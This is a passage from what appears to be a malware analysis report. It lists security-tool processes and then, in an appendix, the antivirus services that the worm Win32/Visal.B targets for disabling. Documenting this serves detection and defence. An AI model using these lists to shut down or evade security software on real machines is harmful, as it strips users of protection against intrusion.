                m2nl.bat
                mbam.exe
                mcagent.exe
                mcappins.exe
                mcaupdate.exe
                mcdash.exe
                mcinfo.exe
                mcinsupd.exe
                mcmnhdlr.exe
                mcregwiz.exe
                mcupdmgr.exe
                mcupdui.exe
                mcvsftsn.exe
                mcvsmap.exe
                mghtml.exe
                msdos.pif
                msfir80.exe
                msime80.exe
                msizap.exe
                msmsgs.exe
                msvcm80.dll
                msvcp80.dll
                msvcr71.dll
                msvcr80.dll
                mzvkbd.dll
                mzvkbd3.dll
                naPrdMgr.exe
                naiavfin.exe
                netcfg.dll
                new folder.exe
                njibyekk.com
                nod32.exe
                nod32krn.exe
                nod32kui.exe
                oasclnt.exe
                olb1iimw.bat
                pavprsrv.exe
                pavsched.exe
                pavtest.exe
                pctsSvc.exe
                pctsauxs.exe
                pctstray.exe
                preupd.exe
                prloader.dll
                procexp.exe
                psctrlc.exe
                pskmssvc.exe
                ravmon.exe
                rcukd.cmd
                reload.exe
                rescue32.exe
                rescuecd.zip
                rfwProxy.ExE
                rfwmain.ExE
                rfwsrv.ExE
                rose.exe
                safeboxtray.ExE
                sal.xls.exe
                sched.exe
                scvhosts.exe
                scvvhosts.exe
                seccenter.exe
                session.exe
                shstat.exe
                spidercpl.exe
                spiderml.exe
                spidernt.exe
                spiderui.exe
                spml_set.exe
                ssvichosst.exe
                sxs.exe
                system.exe
                tPSrv.exe
                tca.exe
                temp.exe
                temp2.exe
                toy.exe
                trojandetector.ExE
                trojanwall.ExE
                trojdie.KxP
                uiscan.exe
                unp_test.ExE
                update.exe
                updater.dll
                userdump.exe
                v.exe
                vba32ldr.exe
                vbcmserv.exe
                vbcons.exe
                vbglobal.exe
                vbimport.exe
                vbinst.exe
                vbscan.exe
                vbsystry.exe
                virusutilities.exe
                vsmon.exe
                vsserv.exe
                whi.com
                wscntfy.exe
                wsctool.exe
                yannh.cmd
                ybj8df.exe
                zonealarm

                Appendix B. List of Services Targeted for Disabling by Win32/Visal.B

                Avast! Antivirus
                aswUpdSv
                avast! Mail Scanner
                avast! Web Scanner
                AntiVirService
                AntiVirMailGuard
                AntiVirSchedulerService
                AntiVirWebService
                AntiVirFirewallService
                NIS
                MSK80Service
                0053591272669638mcinstcleanup
                mfefire
                McNASvc
                Mc0obeSv
                McMPFSvc
                McProxy
                Mc0DS
                mcmscsvc
                McAfee SiteAdvisor Service
                mfevtp
                McNaiAnn
                McShield
                Avgfws9
                AVG Security Toolbar Service
                avg9wd
                AVGIDSAgent
                PAVFNSVR
                Gwmsrv
                PSHost
                PSIMSVC
                PAVSRV
                PavPrSrv
                PskSvcRetail
                Panda Software Controller
                TPSrv
                SfCtlCom
                TmPlw
                TmProxy
                TMBMServer
                Arrakis3
                LIVESRV
                scan
                VSSERV
                sdAuxService
                sdCoreService
                AVP

                Related Content